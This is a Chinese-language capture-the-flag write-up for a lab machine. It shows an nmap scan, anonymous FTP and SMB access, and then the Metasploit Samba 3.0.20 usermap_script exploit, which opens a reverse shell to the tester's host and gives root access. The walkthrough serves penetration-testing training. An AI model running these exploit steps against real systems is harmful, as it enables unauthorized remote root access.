这是一台非常简单的机器,几乎不值得完成其编写工作。但是我最终决定纯粹是为了完整性。
我用NMAP扫描了机器,并看到以下详细信息。
# Nmap 7.70 scan initiated Thu Aug 22 10:10:07 2019 as: nmap -A -p- -oN scan 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.065s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC5) (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -2d23h03m38s, deviation: 0s, median: -2d23h03m38s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2019-08-19T02:31:04-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 30.07 ms 10.10.14.1
2 31.77 ms 10.10.10.3
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug 22 10:35:22 2019 -- 1 IP address (1 host up) scanned in 1516.09 seconds
从这里我们可以看到FTP,SMB,DISTCC和SSH都在运行。FTP允许匿名访问。但是没有文件。接下来,我尝试连接到SMB:
root@kali://root/websvr# smbclient \\\\10.10.10.3\\tmp -p 445
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Dec 6 16:56:00 2019
.. DR 0 Sun May 20 20:36:12 2012
orbit-makis DR 0 Fri Dec 6 11:25:31 2019
.ICE-unix DH 0 Fri Dec 6 11:03:09 2019
.X11-unix DH 0 Fri Dec 6 11:03:34 2019
gconfd-makis DR 0 Fri Dec 6 11:25:31 2019
.X0-lock HR 11 Fri Dec 6 11:03:34 2019
5120.jsvc_up R 0 Fri Dec 6 11:04:17 2019
7282168 blocks of size 1024. 5678284 blocks available
你会从输出中看到,我们还具有匿名SMB访问权限。但是,经过一些浏览后,SMB内也没有存储有用的文件。
在NMAP扫描中检测到的详细信息之一是正在使用Samba 3.0.20-Debian。我在Google上搜索了涉及此版本SAMBA的漏洞。我发现了一个Username Map Script漏洞利用程序,它可以通过指定包含shell元字符的用户名来执行命令。此漏洞包含在metasploit中。因此,我启动了msfconsole并运行了漏洞利用程序:
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP double handler on 10.10.14.25:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RXu673TIo0yJNYIz;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "RXu673TIo0yJNYIz\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.25:4444 -> 10.10.10.3:59078) at 2019-12-09 20:05:13 +0000
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
whoami
root
cd root
ls
Desktop
reset_logs.sh
root.txt
vnc.log
cat root.txt
[REDACTED]
从输出中,你可以看到漏洞利用程序已成功运行。输入whoami命令显示我以root用户身份运行。从这里,我能够浏览到/ root和cat root.txt。
关注:Hunter网络安全 获取更多资讯
网站:bbs.kylzrv.com
CTF团队:Hunter网络安全
文章:Xtrato
排版:Hunter-匿名者
816
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
